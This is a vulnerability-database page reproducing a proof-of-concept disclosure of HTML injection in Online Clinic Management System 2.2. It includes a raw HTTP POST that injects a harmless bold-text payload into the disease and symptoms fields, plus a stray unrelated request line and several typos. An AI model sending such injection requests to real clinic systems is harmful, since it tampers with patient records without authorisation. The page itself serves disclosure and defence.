Vulners
Lucene search
Online Clinic Management System 2.2 - HTML Injection Vulnerability
# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Software : Online Clinic Management System
# Version : 2.2
# Vulernability Type : HTML Injection
# Vulenrability : HTM Injection
# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
# add disase symptom, patient and appointment section.
# payload: <b><i>asd</i></b>
# HTTP POST request
POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
POST /clinic/disease_symptoms_view.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325041947016922
Content-Length: 1501
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
Upgrade-Insecure-Requests: 1
-----------------------------325041947016922
Content-Disposition: form-data; name="current_view"
DV
-----------------------------325041947016922
Content-Disposition: form-data; name="SortField"
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedID"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedField"
-----------------------------325041947016922
Content-Disposition: form-data; name="SortDirection"
-----------------------------325041947016922
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="NoDV"
-----------------------------325041947016922
Content-Disposition: form-data; name="PrintDV"
-----------------------------325041947016922
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------325041947016922
Content-Disposition: form-data; name="disease"
<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="symptoms"
<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="reference"
-----------------------------325041947016922
Content-Disposition: form-data; name="update_x"
1
-----------------------------325041947016922
Content-Disposition: form-data; name="SearchString"
-----------------------------325041947016922--
# 0day.today [2019-12-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2019 00:00Current
7.1High risk
Vulners AI Score7.1